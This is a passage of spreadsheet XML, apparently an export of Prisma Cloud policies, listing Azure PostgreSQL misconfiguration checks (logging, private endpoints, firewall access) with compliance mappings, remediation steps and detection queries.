      <c r="L2375" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2375" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2375" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2375" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2375" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2375" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="R2375" t="inlineStr">
        <is>
          <t>3.4.2e</t>
        </is>
      </c>
      <c r="S2375" t="inlineStr">
        <is>
          <t>Network,PCI DSS v3.2</t>
        </is>
      </c>
      <c r="T2375" t="b">
        <v>1</v>
      </c>
      <c r="U2375" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2375" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2375" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database servers for which server parameter is not set for log connections. Enabling log_connections helps PostgreSQL Database to log attempted connection to the server, as well as successful completion of client authentication. Log data can be used to identify, troubleshoot, and repair configuration errors and suboptimal performance.</t>
        </is>
      </c>
      <c r="X2375" t="inlineStr">
        <is>
          <t>1. Login to Azure console.
2. Navigate to 'Azure Database for PostgreSQL servers' dashboard
3. Click on the alerted database name
4. Go to 'Server parameters' under 'settings’ block
5. From the list of parameters find 'log_connections' and set it to 'on'
6. Click on 'Save' button from top menu to save the change. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-12
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-12</t>
        </is>
      </c>
      <c r="Y2375" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.DBforPostgreSQL servers/configuration/*' permission. Successful execution will enable log_connections which helps the PostgreSQL database to log attempted connection to the server,
as well as successful completion of client authentication.",
'impact': 'enables log_connections in Azure PostgreSQL database servers',
'cliScriptTemplate': 'az postgres server configuration set --resource-group $resourceGroup --server-name $resourceName --name log_connections --value on'</t>
        </is>
      </c>
      <c r="Z2375" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = "configurations.value[?(@.name=='log_connections')].properties.value equals OFF or configurations.value[?(@.name=='log_connections')].properties.value equals off"
{"category":"Networking","resourceTypes":["azurerm_postgresql_configuration"]}</t>
        </is>
      </c>
      <c r="AA2375" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2375" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2375" t="inlineStr">
        <is>
          <t>PC-AZR-PG-431-CKV_AZURE_31</t>
        </is>
      </c>
      <c r="AD2375" t="b">
        <v>1</v>
      </c>
      <c r="AE2375" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2375" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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5" t="inlineStr">
        <is>
          <t>8673dba3-9bf5-4691-826e-b5fc7be70dad</t>
        </is>
      </c>
      <c r="AI2375" t="inlineStr">
        <is>
          <t>0222b3d5-49a2-49af-9073-847f9a55c289</t>
        </is>
      </c>
      <c r="AJ2375" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2375" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2376">
      <c r="A2376" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2376" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2376" s="2" t="inlineStr"/>
      <c r="D2376" t="inlineStr"/>
      <c r="E2376" t="inlineStr"/>
      <c r="F2376" t="inlineStr"/>
      <c r="G2376" t="b">
        <v>1</v>
      </c>
      <c r="H23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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2376" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2376" t="inlineStr">
        <is>
          <t>Azure PostgreSQL servers not configured with private endpoint</t>
        </is>
      </c>
      <c r="L2376" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2376" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2376" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2376" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2376" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2376" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2376" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2376" t="inlineStr"/>
      <c r="T2376" t="b">
        <v>0</v>
      </c>
      <c r="U2376" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2376" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2376" t="inlineStr">
        <is>
          <t>This policy identifies Azure PostgreSQL database servers that are not configured with private endpoint. Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for PostgreSQL. Configuring a private endpoint enables access to traffic coming from only known networks and prevents access from malicious or unknown IP addresses which includes IP addresses within Azure. It is recommended to create private endpoint for secure communication for your Azure PostgreSQL database.</t>
        </is>
      </c>
      <c r="X2376" t="inlineStr">
        <is>
          <t>1. Login to Azure portal.
2. Navigate to 'Azure Database for Postgres servers'
3. Click on the reported Postgres server instance you want to modify 
4. Select 'Networking' under 'Settings' from left panel 
5. Under 'Private endpoint', click on Add private endpoint' to create a add add a private endpoint
Refer to below link for step by step process:
https://learn.microsoft.com/en-us/azure/postgresql/single-server/how-to-configure-privatelink-portal 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-42
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-42</t>
        </is>
      </c>
      <c r="Y2376" t="inlineStr"/>
      <c r="Z2376" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = properties.userVisibleState equal ignore case Ready and properties.privateEndpointConnections[*] is empty
{"category":"General","resourceTypes":["azurerm_postgresql_server"]}</t>
        </is>
      </c>
      <c r="AA2376" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2376" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2376" t="inlineStr">
        <is>
          <t>PC-AZR-PG-1068-CKV2_AZURE_42</t>
        </is>
      </c>
      <c r="AD2376" t="b">
        <v>1</v>
      </c>
      <c r="AE2376" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2376" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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6" t="inlineStr">
        <is>
          <t>d670580e-266a-44bb-9f31-6d3dd548eb68</t>
        </is>
      </c>
      <c r="AI2376" t="inlineStr">
        <is>
          <t>0a2feecd-80f9-47f8-9cfc-6d54d4463298</t>
        </is>
      </c>
      <c r="AJ2376" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2376" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2377">
      <c r="A2377" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), ISO/IEC 27001:2022, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, kfirdaus AWS Account-CS, ISO 27002:2022, Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, NIST CSF, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, ISO 27002:2022, ISO/IEC 27002:2013, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, CIS v1.3.0 (Azure), NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), CIS v1.5.0 (Azure) - Level 1, Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), CIS v1.2.0 (Azure), ISO/IEC 27018:2019, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), CIS v2.1.0 (Azure) Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, CIS v2.0.0 (Azure) Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2024.2, Copy of Azure Security Benchmark (v3), ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, CIS Controls v8, MLPS 2.0 (Level 2), Azure Security Benchmark (v3), MTSBv2_Azure, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CIS v1.3.1 (Azure), APRA (CPS 234) Information Security, Copy of Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), ISO/IEC 27002:2013, CIS v1.4.0 (Azure), Azure Security Benchmark (v2), CSA CCM v.4.0.1, HITRUST v.9.4.2 [Deprecated], Azure Security Benchmark (v3), Copy of CIS v1.2.0 (Azure), ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v7.1, ISO/IEC 27002:2013, Azure Security Benchmark (v3), ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Azure Security Benchmark (v3), Azure Security Benchmark (v3), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2377" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2377" s="2" t="inlineStr"/>
      <c r="D2377" t="inlineStr"/>
      <c r="E2377" t="inlineStr"/>
      <c r="F2377" t="inlineStr"/>
      <c r="G2377" t="b">
        <v>1</v>
      </c>
      <c r="H23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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2377" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2377" t="inlineStr">
        <is>
          <t>Azure PostgreSQL Database Server 'Allow access to Azure services' enabled</t>
        </is>
      </c>
      <c r="L2377" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2377" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2377" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2377" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2377" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2377" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2377" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2377" t="inlineStr"/>
      <c r="T2377" t="b">
        <v>0</v>
      </c>
      <c r="U2377" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2377" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2377" t="inlineStr">
        <is>
          <t>This policy identifies Azure PostgreSQL Database Server which has 'Allow access to Azure services' settings enabled. When 'Allow access to Azure services' settings is enabled, PostgreSQL Database server will accept connections from all Azure resources including other subscription resources as well. It is recommended to use firewall rules or VNET rules to allow access from specific network ranges or virtual networks.</t>
        </is>
      </c>
      <c r="X2377" t="inlineStr">
        <is>
          <t>1. Login to Azure console
2. Navigate to 'Azure Database for PostgreSQL servers' dashboard
3. Select the reported PostgreSQL server
4. Go to 'Connection security' under 'Settings'
5. Select 'No' for 'Allow access to Azure services' under 'Firewall rules'
6. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled</t>
        </is>
      </c>
      <c r="Y2377" t="inlineStr"/>
      <c r="Z2377" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = properties.publicNetworkAccess equal ignore case Enabled and firewallRules.value[*].properties.startIpAddress equals "0.0.0.0" and firewallRules.value[*].properties.endIpAddress equals "0.0.0.0"
{"category":"General","resourceTypes":["azurerm_sql_server","azurerm_sql_firewall_rule"]}</t>
        </is>
      </c>
      <c r="AA2377" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2377" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2377" t="inlineStr">
        <is>
          <t>PC-AZR-PG-577-CKV2_AZURE_6</t>
        </is>
      </c>
      <c r="AD2377" t="b">
        <v>1</v>
      </c>
      <c r="AE2377" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2377" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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7" t="inlineStr">
        <is>
          <t>492e32db-49f1-495d-90f8-d1f84662d210</t>
        </is>
      </c>
      <c r="AI2377" t="inlineStr">
        <is>
          <t>dfa7d61c-d608-45a7-b9fd-adecd6da1f25</t>
        </is>
      </c>
      <c r="AJ2377" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2377" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2378">
      <c r="A2378" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.6, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), CIS v2.1.0 (Azure) Level 1, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ITSG-33, Azure Security Benchmark (v2), CIS v2.0.0 (Azure) Level 1, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), ITSG-33, MTSBv2_Azure, CIS Controls v7.1, TX-RAMP Level 2, CIS v1.3.1 (Azure), CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, Fedramp (Low), CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CIS v1.4.0 (Azure), kashan ACSC Information Security Manual (ISM), CIS Controls v8, PCI DSS v4.0, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, CRI Profile v1.2.1, NIST 800-53 Rev 5, TX-RAMP Level 2, testazure, NIST SP 800-171 Revision 3, Fedramp (Moderate), HITRUST v.9.4.2 [Deprecated], CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CIS v1.2.0 (Azure), CSA CCM v.4.0.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, CIS v1.5.0 (Azure) - Level 1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, FFIEC, PCI DSS v4.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, CIS Controls v8.1, jneytchev-fedramp-low, Copy of CIS v1.2.0 (Azure), CSA CCM v4.0.12, CIS v1.3.0 (Azure), DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, CIS v1.1 (Azure), NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2378" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2378" s="2" t="inlineStr"/>
      <c r="D2378" t="inlineStr"/>
      <c r="E2378" t="inlineStr"/>
      <c r="F2378" t="inlineStr"/>
      <c r="G2378" t="b">
        <v>1</v>
      </c>
      <c r="H23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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2378" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2378" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database server with log checkpoints parameter disabled</t>
        </is>
      </c>
      <c r="L2378" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2378" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2378" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2378" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2378" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2378" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2378" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2378" t="inlineStr"/>
      <c r="T2378" t="b">
        <v>1</v>
      </c>
      <c r="U2378" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2378" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2378" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database servers for which server parameter is not set for log checkpoints. Enabling log_checkpoints helps the PostgreSQL Database to Log each checkpoint in turn generates query and error logs. However, access to transaction logs is not supported. Query and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.</t>
        </is>
      </c>
      <c r="X2378" t="inlineStr">
        <is>
          <t>1. Login to Azure console.
2. Navigate to 'Azure Database for PostgreSQL servers' dashboard
3. Click on the alerted database name
4. Go to 'Server parameters' under 'Settings' block
5. From the list of parameters find 'log_checkpoints' and set it to on
6. Click on 'Save' button from top menu to save the change. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-11
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-11</t>
        </is>
      </c>
      <c r="Y2378" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.DBforPostgreSQL servers/configuration/*' permission. Successful execution will enable log_checkpoints which helps the PostgreSQL Database server to log each checkpoint in turn generates query and error logs.",
'impact': 'enables log_checkpoints in Azure PostgreSQL database servers',
'cliScriptTemplate': 'az postgres server configuration set --resource-group $resourceGroup --server-name $resourceName --name log_checkpoints --value on'</t>
        </is>
      </c>
      <c r="Z2378" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = "configurations.value[?(@.name=='log_checkpoints')].properties.value equals OFF or configurations.value[?(@.name=='log_checkpoints')].properties.value equals off"
{"category":"Networking","resourceTypes":["azurerm_postgresql_configuration"]}</t>
        </is>
      </c>
      <c r="AA2378" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2378" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2378" t="inlineStr">
        <is>
          <t>PC-AZR-PG-432-CKV_AZURE_30</t>
        </is>
      </c>
      <c r="AD2378" t="b">
        <v>1</v>
      </c>
      <c r="AE2378" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2378" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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8" t="inlineStr">
        <is>
          <t>703f7b61-be54-4b6f-be1d-bab81899ec87</t>
        </is>
      </c>
      <c r="AI2378" t="inlineStr">
        <is>
          <t>52e0ab32-b1ae-4e4e-9245-4bd0f8057895</t>
        </is>
      </c>
      <c r="AJ2378" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2378" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2379">
      <c r="A2379" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CIS Controls v7.1, Copy of Azure Security Benchmark (v3), Sarbanes Oxley Act (SOX), CRI Profile v1.2.1, kashan ACSC Information Security Manual (ISM), CIS v1.4.0 (Azure), CIS v1.5.0 (Azure) - Level 1, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), MTSBv2_Azure, ISO 27002:2022, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), ISO/IEC 27001:2022, CIS v2.0.0 (Azure) Level 1, ISO/IEC 27002:2013, ITSG-33, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.3.0 (Azure), ACSC Information Security Manual (ISM), Copy of CIS v1.2.0 (Azure), CDC NIST 800-53 Rev4, CSA CCM v4.0.12, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, CIS v1.1 (Azure), APRA (CPS 234) Information Security, NIST 800-53 Rev 5, ISO/IEC 27017:2015, NIST 800-53 Rev4, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, CSA CCM v4.0.12, kashan ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, CIS Controls v8, PCI DSS v4.0, CIS v1.2.0 (Azure), NIST CSF, Azure Security Benchmark (v3), Copy of New Zealand Information Security Manual (NZISM v3.4), HITRUST v.9.4.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, NIST SP 800-171 Revision 3, CIS Controls v8.1, ITSG-33, TX-RAMP Level 2, TX-RAMP Level 1, ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 2, NIST CSF, CIS v2.1.0 (Azure) Level 1, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, CSA CCM v.4.0.1, CIS v1.3.1 (Azure), DORA, CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST CSF v.11.2.0, NIST CSF, Copy of CIS Controls v8, RBI Baseline Cyber Security and Resilience Requirements, testazure, NIST SP 800-172, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, ITSG-33, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), DORA, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-171 Revision 3, PCI DSS v3.2.1, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2379" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2379" s="2" t="inlineStr"/>
      <c r="D2379" t="inlineStr"/>
      <c r="E2379" t="inlineStr"/>
      <c r="F2379" t="inlineStr"/>
      <c r="G2379" t="b">
        <v>0</v>
      </c>
      <c r="H23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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2379" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2379" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database server log retention days is less than or equals to 3 days</t>
        </is>
      </c>
      <c r="L2379" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2379" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2379" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2379" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2379" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2379" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2379" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2379" t="inlineStr"/>
      <c r="T2379" t="b">
        <v>1</v>
      </c>
      <c r="U2379" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2379" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2379" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database servers which have log retention days less than or equals to 3 days. Enabling log_retention_days helps PostgreSQL database server to Sets number of days a log file is retained which in turn generates query and error logs. Query and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.</t>
        </is>
      </c>
      <c r="X2379" t="inlineStr">
        <is>
          <t>1. Login to Azure console.
2. Navigate to 'Azure Database for PostgreSQL servers' dashboard
3. Click on the alerted database name
4. Go to 'Server parameters' under 'Settings' block
5. For 'log_retention_days', enter value in range 4-7 (inclusive) and click on 'Save' button.</t>
        </is>
      </c>
      <c r="Y2379" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.DBforPostgreSQL servers/configuration/*' permission. Successful execution will enable log_retention_days which helps the PostgreSQL database to set number of days a log file is retained,
which in turn generates query and error logs. NOTE: Recommended Log retention days value can be in 4-7 inclusive range. This CLI will set log retention days to 4.",
'impact': 'enables log_retention_days in Azure PostgreSQL database servers',
'cliScriptTemplate': 'az postgres server configuration set --resource-group $resourceGroup --server-name $resourceName --name log_retention_days --value 4'</t>
        </is>
      </c>
      <c r="Z2379" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = "configurations.value[?(@.name=='log_retention_days')].properties.value less than 4"</t>
        </is>
      </c>
      <c r="AA2379" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2379" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2379" t="inlineStr">
        <is>
          <t>PC-AZR-PG-427</t>
        </is>
      </c>
      <c r="AD2379" t="b">
        <v>1</v>
      </c>
      <c r="AE2379" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2379" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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79" t="inlineStr">
        <is>
          <t>e7bf8164-149e-4e05-aca7-ee2e95e188d0</t>
        </is>
      </c>
      <c r="AI2379" t="inlineStr">
        <is>
          <t>df0d88e1-2c09-406f-a100-d1ddd29fc1bc</t>
        </is>
      </c>
      <c r="AJ2379" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2379" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2380">
      <c r="A2380" t="inlineStr">
        <is>
